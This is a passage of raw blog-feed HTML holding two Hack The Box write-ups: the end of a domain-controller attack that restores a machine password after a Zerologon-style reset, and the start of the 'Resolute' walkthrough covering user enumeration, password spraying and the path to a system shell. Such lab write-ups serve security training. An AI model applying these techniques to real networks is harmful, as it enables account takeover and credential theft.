class="language-text">administrator</code> user's hash to get a system shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/201323b313c58e648bcd3d726622fde3/6106f/system-shell-1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 38.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVR42o2R2XKCQBBF+ZQYoyCKErZhYIZVHEHikpQ+5f9/46YZTVl5MMnDrV5q6sztbsPi7zD5BXbcQ9QHNN0FandGf/rEujujas+YhyUmroATFPB4A5fVcKP6lq+1VlGFqRPD8HgLN1bUbBCJLcJ0Cy5bxFmLpNghotxLNpj5GYJUUU1v6J1PPZZ1CCgOdSgU7FcJI8l7pOUbAXZaQbJFtj4iLXpMlylM0vMsusu6akT5yAp/aEw9Q5YHlOoDsjoQ6ARBMW9OyGj8YYxlWMFaCYznDGP7L0VXh6Lck8s9OOU5QQOuyKkCo3EHqO3Kf8BuQO2sPhLoiAE+1MMHTHaQ5HLYk3kbfbLgv8I0kNERmGi1Ar5BTNGPGzhegYWX6ws6fqGdfu/zEfBFj5z1V2BKlxWdBplzjtE01Mt/Mu9Lfwy7A78AShkFkdpoTp8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell with administrator hash" title="" src="/static/201323b313c58e648bcd3d726622fde3/50637/system-shell-1.png" srcset="/static/201323b313c58e648bcd3d726622fde3/dda05/system-shell-1.png 158w, /static/201323b313c58e648bcd3d726622fde3/679a3/system-shell-1.png 315w, /static/201323b313c58e648bcd3d726622fde3/50637/system-shell-1.png 630w, /static/201323b313c58e648bcd3d726622fde3/6106f/system-shell-1.png 708w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The PoC also provides a way to restore the password to its original value. When the DC machine account hash is changed to an empty string, the NT hash becomes <code class="language-text">31d6cfe0d16ae931b73c59d7e0c089c0</code>, allowing for authentication without a password. But, the original value is still stored within LSA secrets as a hex value which can be seen with <code class="language-text">secretsdump.py</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fe9abbd7ab96b55abaa020bca22081a3/1591e/secretsdump-plain-password-hex.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVR42k1S2ZKbQBDjW5JsvGtsr7G5bxiOAQw2ENubl/z/Xyga2MrmQaWhi1KrW61tvBE//Rl60CBvZtT9E3L4QNHOCPILXo0Am1OIo5Pj7JdEATMo/731U4TvWxM/dAsvhOYmHcywxplw0w52JOHEDfysQ5j3cJMG3vK+4OQV2J9jHKwEezOB4WR4OwYUtChoL6JaXI78+YpQDEjrGXF5W5BWI5KaTIRiFbbZ9OSJxaHh5tjRnRJSgqtLm4KFEhhXEQpmcqbQhIqji/aOXE5cxcT3vLyL9hfq4YlUjvDTFgYb7Oj6SLebgwfNihruoqL9gl3VTmLoBseyc+gc62Bny3h7kzXy67uPb2/mf2PaeNk5CxaH3fwHxeXJsa7cZYOdmWF7TqErmIoTvDMQFYpi1WT32ehgp1+w0tVhzWTjrEeSXuD5NSxHwKJT16v4XcEPatis2RRzXAHHW3Gi4y1d6fsvbJTDeXhg5r6m4TdudNpyf337wLW7k+8Y+w/I4oqaoSluqytkOaAhN+RKXCASSe4RHX1oEQViFtXNhdWEkAF54oaAYQUMKmJtAQNTtbBQtRGRClJxPTKgGSkNBDwh7UYXU/eAZJcsqCB4h3koUSxcrwhWFqoeSwieTcbDVv+E3J1DIccIYeoW/gKzhFmneTk6RAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump plain password hex" title="" src="/static/fe9abbd7ab96b55abaa020bca22081a3/50637/secretsdump-plain-password-hex.png" srcset="/static/fe9abbd7ab96b55abaa020bca22081a3/dda05/secretsdump-plain-password-hex.png 158w, /static/fe9abbd7ab96b55abaa020bca22081a3/679a3/secretsdump-plain-password-hex.png 315w, /static/fe9abbd7ab96b55abaa020bca22081a3/50637/secretsdump-plain-password-hex.png 630w, /static/fe9abbd7ab96b55abaa020bca22081a3/1591e/secretsdump-plain-password-hex.png 833w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Therefore, the password can be restored to the original value using <code class="language-text">restorepassword.py</code> within the PoC directory and specifying the netbios name, IP, and hex of the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d4b47895889a95aa2f25782d6d60be62/1591e/restorepassword.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABGElEQVR42j2P6XKCQBCEeRRTpgAVLy4JxyLHsiwEi0ujib7/Y3QmmOTHV709u9Xbo6iHBrrfw0tb1N0ddf9A1T1QvF9RNFfw+gOiuSGrLrB8AcM+QjUjqLsAWyfBhrxBXrMYVoQSpSeEsUSSN0hFj0QMSMsBSTkilSNY3iIuOvIDMnmelJFnBb0tezDe4kjEokNejVDq9k5NqAENuBzAqzPE6fO/mWy/yN/IX1DS/GeLnNrGnD4Rz0CWU6m0QZQ1UJygnFax/AKOz+GGAoeoIiScUMKNSuy9fLo3PT6dd26GlRnDoBXXVgxt/Yb5wpmgQAGP1RQksdwE0InFLsJiG0662jMsSWeajZluP1Vz8KL/YWO+dPH6yzc3ha3rdjS9rAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump plain password hex" title="" src="/static/d4b47895889a95aa2f25782d6d60be62/50637/restorepassword.png" srcset="/static/d4b47895889a95aa2f25782d6d60be62/dda05/restorepassword.png 158w, /static/d4b47895889a95aa2f25782d6d60be62/679a3/restorepassword.png 315w, /static/d4b47895889a95aa2f25782d6d60be62/50637/restorepassword.png 630w, /static/d4b47895889a95aa2f25782d6d60be62/1591e/restorepassword.png 833w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After changing the password back to original, trying to authenticate as <code class="language-text">MONTEVERDE$</code> with an empty password no longer worked:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/34f9c62deab1784f1974b463b5993792/986c4/no-pass-logon-failure.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.18987341772152%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAr0lEQVR42j2OWw6CMBBF2YuCEh5VaIEpL2kBMSCauP+1XMd++HEy92YymeOd5YiAPvDViqQw0GaFHt8gu6M0T+T1HZfSIqMZibw5TmmNY1zB/xGVOITqj5eVM4r24chpgqQRql1cV92Cql9dbuwL9bCD+g2qWZDrGYqfZZVFKGpE1xZhquEJaUDdymwQcnALUVhnlbKNUIatBs4DH0+I8xubEYJEM8S2DM9QcI8rfAEd/GMStShQxgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="no password logon failure" title="" src="/static/34f9c62deab1784f1974b463b5993792/50637/no-pass-logon-failure.png" srcset="/static/34f9c62deab1784f1974b463b5993792/dda05/no-pass-logon-failure.png 158w, /static/34f9c62deab1784f1974b463b5993792/679a3/no-pass-logon-failure.png 315w, /static/34f9c62deab1784f1974b463b5993792/50637/no-pass-logon-failure.png 630w, /static/34f9c62deab1784f1974b463b5993792/986c4/no-pass-logon-failure.png 831w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using <code class="language-text">secretsdump.py</code> as the <code class="language-text">administrator</code> user to dump NTLM hashes confirmed that the password for <code class="language-text">MONTEVERDE$</code> was restored to the original value:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4160133bc8d2724a12a9e45a2ee92f85/caa4e/secretsdump-restored-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 40.50632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABl0lEQVR42j1S7XKbMBDkXRKcaR3XhoABY4QA8SER8Feok/b9n2O7kif9sbM3J7Hs7cl7CSVW8Qg/GrDLNRr9gXog9IKyu2CbNPB3OdaRRJi2eMsUogPZQWG7r7DaHbAKcvjbDF546JEKjSitEGUta4M47xEfBySsk4Jnx97Vtrd5K/ErKh1vY0kWeF4n8DfEawLPXhTtBXkzo+qvzlWhTuydIbsrjuwX6oxMjoj4I4s47xAmNdbBEc8/93j6ETu28IR6CEnCjtmYBe145+gL1PgbFce33E2fj9o86sZ80P3gInjZZP9FvVbf0Go6q0eUFC/pVvY3J2jFv1Ez22q40fXFiapxQT9/YiDq4YpgX8NfU1CZu3MkmhNSZiWayYlWFHUijhdIQnAKwRgquzCKVzy3S2zpNisNBZmhPv2Fnv+4jxTd1vyg5uXh9IV+IuYvaPLEMTWdGjozdDiz/z7d0Vun5DBt3NheUhgUzRm5nLjlDjtaDxKFIFW8xGfBp5Ky10UCLbfacsOKm+1cLfC6SbFihtadzfAfJbwZrEr8MC8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump restored hash" title="" src="/static/4160133bc8d2724a12a9e45a2ee92f85/50637/secretsdump-restored-hash.png" srcset="/static/4160133bc8d2724a12a9e45a2ee92f85/dda05/secretsdump-restored-hash.png 158w, /static/4160133bc8d2724a12a9e45a2ee92f85/679a3/secretsdump-restored-hash.png 315w, /static/4160133bc8d2724a12a9e45a2ee92f85/50637/secretsdump-restored-hash.png 630w, /static/4160133bc8d2724a12a9e45a2ee92f85/caa4e/secretsdump-restored-hash.png 832w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-resolute/https://mgarrity.com/hack-the-box-resolute/Sat, 09 Dec 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/495f67dccfbd0cb79b4d8bcd0c02ef0e/3b67f/resolute.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVR42mMQkdX+jwuLymn/F5LR+c8tqfNfUAbCx6cehBnwGcYjqf1fWk71v4GWyn8ZebX/vJKEDWXAZRiflPZ/S0ON/w35gf8XTy/6X5fn99/CQAMsjs9QrAYKAr2poKD6Py0t+H/S3MP/dy+a9D9iys7/2dnh/+XkVP4LyeoQbyDEq7r/zfWU/ydXlf736tz1/8XuRf/tqtf8T6goAYqrAL2ug9OVWF0oBIwAWSXt/yVRJv/rq0r+v/v47X90RMj/vFADoLgOWJ4kL4sBbQe5wlhX7X9Xjsv/Mxs6/tcn2fw31VMHhqEOWJ6sWAYZKiGn8V9LTfG/hLwW+bGM7FIROVAa1APy8bsMZiAAFPgM4vOoIDkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Resolute" title="" src="/static/495f67dccfbd0cb79b4d8bcd0c02ef0e/50637/resolute.png" srcset="/static/495f67dccfbd0cb79b4d8bcd0c02ef0e/dda05/resolute.png 158w, /static/495f67dccfbd0cb79b4d8bcd0c02ef0e/679a3/resolute.png 315w, /static/495f67dccfbd0cb79b4d8bcd0c02ef0e/50637/resolute.png 630w, /static/495f67dccfbd0cb79b4d8bcd0c02ef0e/fddb0/resolute.png 945w, /static/495f67dccfbd0cb79b4d8bcd0c02ef0e/3b67f/resolute.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Resolute is a Windows machine running Active Directory. A few different methods can be used to enumerate users on the system and reveal an initial account creation password in a description field. This can be leveraged for a password spray against a list of users, leading to a successful logon for one of the accounts. These credentials can be used to obtain a shell over WinRM. Once on the system, a PowerShell transcript directory can be discovered with a log file that contains another user's credentials which can then be used to move laterally. This user is a member of DnsAdmins, the privileges granted to this group can be exploited to inject a custom DLL into the DNS service, resulting in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/acb11338ac1fd77c56948050a67e71fc/a7269/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 114.55696202531647%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAXCAYAAAALHW+jAAAACXBIWXMAAAsTAAALEwEAmpwYAAADw0lEQVR42nVUV3LjSBTjTXYsSwwiKeacSUVHWXaVP/b+58DiNTnJM/uB6iARjYeHbs1IDrDqT5jlDU51Rn14Jd4wPX3icv0Xzf4KJ+zgZxP8fA/Tq7FxCtxvs79Cq8dXFN0D2v0zsvaCuD6jml4RVydE5REJ13n3hGp4RlAc4MY9bB5wb/8P4XC8Ia0v6KlqON0wnT+QNReSPyJpzvCSEbtkgO4W+GbEuDMThZWV/hWaEMU8uegeqfJVEdt+g+H8jvHywb0ryR8QpHtVukLUUWULN+o579VaDrX4nVb1z8j5gahUygghlAPK/gn96R0dq6jHF0S0QRSbu0p5aQXtPPL/ll+zihKakBUCEuQLYUDz++MbEhJIM2TtpyNCmXP0qSZIB4T5pObicyj+Uq02UkFF0wP15wmiWD7y4gGelBN0Cm7YK9hUtaUqk57q2xSGncJyc64zGE4+e9iwg1X3jJKNmE4fCBIhHJVvcXFCnB+Vkh298tllN2hgMjpCarDbJkl1K8TGjKFlEhOWW7RPyKoLSs59Ki2aB0UgasRTGbccRaF4ZtMzJ+AeSV3uydoUhQ3NbiSL7ePsJYm8aECUHZCIOkKskHK3XgOHZKLSckr8s46wMjPcGSnBcRNAa0nWTVe0JK7pXzteEaYkK8/KBvE0KdkcWmDYBf2qCPGxg+E2uLdyBrrAihldGSE08Sekgijbz95RnSixvVbNlbqgxy4c1J7rs1E+mxTwf347E1ok1EOOCTQhk2akVCFd3bGj210Dg6d+Y0l3m/gHVt/nOm8FS5RyfxBuQu5F0ESFEErJ4mPNMA/7G8r6AUl+IHlLdb1S6VDRrK7HhiQz2QKTh2w8aAG9GY/v6HnFBCWbMn/YKKWzZ9LNelnLvMFaCM38D1LNpl/D4YY9H4XxQGI2pWKEJEobi2XpCe7ZxV+xItYkE3wlVSUXzF8kIc6O8EKJRKU6KoQ6vVzTq98hxNmChXQh1nYsreTD0DAiOR/YKJkQLvB5/SQFYoHJQ0y75EHlPF9g2NVPpaYibHHgdTvwTk8sue1fVMkZc5gUc6SEUHLoyr32Z0iMdmyOeDqrni3QHD5FkzyuEvDhBcfLJ7v8hrp7UaXrW578xce1KvXn/Fc7tC2vkJRcUlHK8qT0snlExdg4DLKoED9XekyCZPHtS5P0GTLXQvrk8xWOWJLPhgRyO+SliWbEvNO7sFMPgARfypZcfs+jFw7qRnn8r+xpGVUFckPok5BFcv34kbd4JN6pOUl8+Z1psPgyixXGb00qVSL+A0vk7T7XuHxuAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/acb11338ac1fd77c56948050a67e71fc/50637/nmap-scan.png" srcset="/static/acb11338ac1fd77c56948050a67e71fc/dda05/nmap-scan.png 158w, /static/acb11338ac1fd77c56948050a67e71fc/679a3/nmap-scan.png 315w, /static/acb11338ac1fd77c56948050a67e71fc/50637/nmap-scan.png 630w, /static/acb11338ac1fd77c56948050a67e71fc/a7269/nmap-scan.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: megabank.local</li> <li>hostname: RESOLUTE</li> </ul> <p>An anonymous login over SMB authenticated, but didn't provide access to any shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c0e84fa628cc1d387ff81395b2be4d4a/99285/crackmapexec-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtUlEQVR42i2L21KDMBRF+RiFyDWhXBoKhSSFjk4rWp8c//87ljHjw5qzZu+zIyEtot1J2huq35jNzuI+mJZ32mEjKQbiTJPImTj1nmqeX47hJtmAyE7/+eBzTVSOP1RqRvuxXR+Yy4NOX2n6FbN+BvJqohru2Ndv3PbFcXyj7i7IxqJaR3Ww3h1ZdSZSeicWPXl5om4MypdpMQZq/ywPC0+iQ6SjdxeGfxRqIZdn0nIKXtYm+C/Pq2LL86nvXQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec attempt to list shared" title="" src="/static/c0e84fa628cc1d387ff81395b2be4d4a/50637/crackmapexec-shares.png" srcset="/static/c0e84fa628cc1d387ff81395b2be4d4a/dda05/crackmapexec-shares.png 158w, /static/c0e84fa628cc1d387ff81395b2be4d4a/679a3/crackmapexec-shares.png 315w, /static/c0e84fa628cc1d387ff81395b2be4d4a/50637/crackmapexec-shares.png 630w, /static/c0e84fa628cc1d387ff81395b2be4d4a/99285/crackmapexec-shares.png 805w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I tried to enumerate domain users which was successful. One of the users (<code class="language-text">marko</code>) had a field containing a default password used for the creation of accounts:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/debc2457d1a8d52599176ad49d0f75a5/3204e/crackmapexec-users.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 83.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAADNUlEQVR42nWT6XLiRhzEeZL4QsLGHNLMaGak0S0hhAGDz2SzW8mnpPb9X6C3EeuUK5V86BKj40f3/xh5ooNnX+GbI6TboO3f0G7eUa+fYfIe3r3Bza3CeBbjZsLrRFKCCuHz2WTh4M+TQR7fGS3SNyxkAe16pNUjsmoPZVcIohpJsUNaP2Imcsz1ir8PSIsHhFGFech7YYaFKs7PyZjyHoHvCGSJJN+i7l5Qrp5g0w1s9oCmf0VO4P3SQUYtXPEIm++hsz1E3BOYYhYkmC4sFWMy0xj5+gXjOwth1oj5ckxXC1ljGTWDI51uGTnGrVjx+QMyliErNiiLFYqihbANbqYsy1TjmqUY2XiNcC7RuBxNXqMvKxQmRhU7rPjRrqrgRIStE+gThVhqVEbBLOdYLjXrSNAAPGuUxPznUKJLU7RZhXVRorQJcuMIr1G5EpIfNjrChsBIaGSRhl4ucekrwixBHyIwZLGjQCKzKaq0HBRHCRLtkKUtpqLBhW8xmxlkKoIKNWKlYYWCXixwPw1xxc5f356kMCrtBuksZKQMz1WN17pBqxOsrcNT3aF3Nca+gQ40dk4O0C6OBqeXEzOM0vUgAv0Qo0L0cP4SG5XhkDRUjTawVILXfIVjUhGomULjkCrk0RnYmAjjU8y7T+J5dKW/4pexYrd6JNVh0ExUnK8WefeOmOcLOszp7M9GYMc6vheSCejqlpAP3ZlBI998wY0nYdjtgmNScO4CWUFwbBrOZc5Bv/AMykjh7y7AI2P/RuDecWsIGv8b6KkXXHsKks1Jsu0w4KctWBCa18fhfEmHMUfn10Kg48jsCa21gn+C3BpCzSeH9huux3SY9HR3RNkcEaiK69UMe33alJPDig7/osNDSoelwIrgD9igf4DR6xBZGe5qsYfLd3RYYEmHBeHu5JDATEb4owmxiSWeMzlcP8M+ROA7gWIAnmDpCRgQyMaU7RP39xRZw0mFL1WIns14ys6Rvf8E2q+4GQvYZM24T+fIP5vSrt+GJl14XDct8b1f4pgK/E7wNvk/h+EeY0YOCTFxN+h+kdFljtg9QNsOVwSaQBEWstuSLiUdc5Ann2r4E/wDC+Iwhz5h6pcAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec enumerate users" title="" src="/static/debc2457d1a8d52599176ad49d0f75a5/50637/crackmapexec-users.png" srcset="/static/debc2457d1a8d52599176ad49d0f75a5/dda05/crackmapexec-users.png 158w, /static/debc2457d1a8d52599176ad49d0f75a5/679a3/crackmapexec-users.png 315w, /static/debc2457d1a8d52599176ad49d0f75a5/50637/crackmapexec-users.png 630w, /static/debc2457d1a8d52599176ad49d0f75a5/3204e/crackmapexec-users.png 802w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials didn't authenticate when I attempted to use them to list the shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d02855328f35eb1c97dd95e6f5a6bcbe/d009f/marko-logon-failure.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAs0lEQVR42lWOW7KCQAxEWYsl6oVRZkQYkIfK84qllpbl/ndyjPPnR1enk3Qn3iyemKd3AjvQnl8chif95U3R3LBFix9aVpuM9XaPinIWUckyrvFVxuIH1rEXpR06OZJXI3UrIdVEUozE+4FmfAr3rOOj9K+cxge2ntCZeGyHsa2DTk7otJG9A942/xfRoUzJRi4HUcGfrghMjcl6VvKRH8qHKndaSfh39jU77ETr0tWhKfkA+UVi3Uo3Wu8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="marko logon failure" title="" src="/static/d02855328f35eb1c97dd95e6f5a6bcbe/50637/marko-logon-failure.png" srcset="/static/d02855328f35eb1c97dd95e6f5a6bcbe/dda05/marko-logon-failure.png 158w, /static/d02855328f35eb1c97dd95e6f5a6bcbe/679a3/marko-logon-failure.png 315w, /static/d02855328f35eb1c97dd95e6f5a6bcbe/50637/marko-logon-failure.png 630w, /static/d02855328f35eb1c97dd95e6f5a6bcbe/d009f/marko-logon-failure.png 798w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since the discovered password was used for the creation of new user accounts, this meant that the password could potentially still be in use for another account on the system, and I had a list of users to run a password spray attack.</p> <p>I copied the <code class="language-text">crackmapexec</code> output into a file called <code class="language-text">crackmapexec-users</code> and used <code class="language-text">awk</code> to extract just the usernames and saved it into a file called <code class="language-text">users</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d56d78383978b04082398dc8bf0dacf5/3376a/awk-users-list.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB30lEQVR42pWT25qaQBCEeZRwBlEROcwgctDNuomazZervP+TVKoHEndZN5tc1AcO07/V1TNWkB/gVc+IyguSckA3nDAcz+ip7nCBbr9gXXaI0xrLVGOR7rAqjlDdGXlzMlrmA5K8Q8Q9lrsZ4OkfyIafiIsH1N0T2uMV7eGKPaX7M5JtC3+pEFL+UrNwTygh2w6LrEWYNkbBSsMquwvy9ozdgS7XDdxFxQ87BGvZ0Jh3N9FwYgVnofidz7iCHZWTKq6PchMFq334Dk3bIRf8uIDtZ9QGdpDBiQpT7E6gDyXAuv2KNO+RiGUuOEEOlzDbS+H46b/DJlkNWy3qR3zytnDCnMDtK7n/41CA+8M35OrINlkclnAjfog1VZvftr8mmO2HIu5hDB8Ct9VnZqZGiIFpA5YsDSAuxzwFyhjk+T5wkKGcWahvMIIlSydinot62qxHyYQlX3F7D7jrxOEj7FDNgNnUXn230ADv5Gs1/fMIDKpXQDcsXkxZm7NoZJz+JUNxWOon/uNLh6NM25JZMA7ESGJgpu8C6/aCDe+mAUZ6BqVT3gRx68qREqCc0d+DMWA9a3ngOdQnFih4AnwDnckMpvzjeu6WLV+xynpuKG/AOdi8q5ukmPdYLsL8XP4COYzO1Ju9A6AAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="awk users list" title="" src="/static/d56d78383978b04082398dc8bf0dacf5/50637/awk-users-list.png" srcset="/static/d56d78383978b04082398dc8bf0dacf5/dda05/awk-users-list.png 158w, /static/d56d78383978b04082398dc8bf0dacf5/679a3/awk-users-list.png 315w, /static/d56d78383978b04082398dc8bf0dacf5/50637/awk-users-list.png 630w, /static/d56d78383978b04082398dc8bf0dacf5/3376a/awk-users-list.png 694w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Running the password against the <code class="language-text">users</code> list resulted in a successful logon for <code class="language-text">melanie</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8ed65f3d86cc734fe8b780c7ef7d3a8d/14945/melanie-logon-success.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 127.21518987341773%; position: relative; bottom: 0; left: 0; background-image: 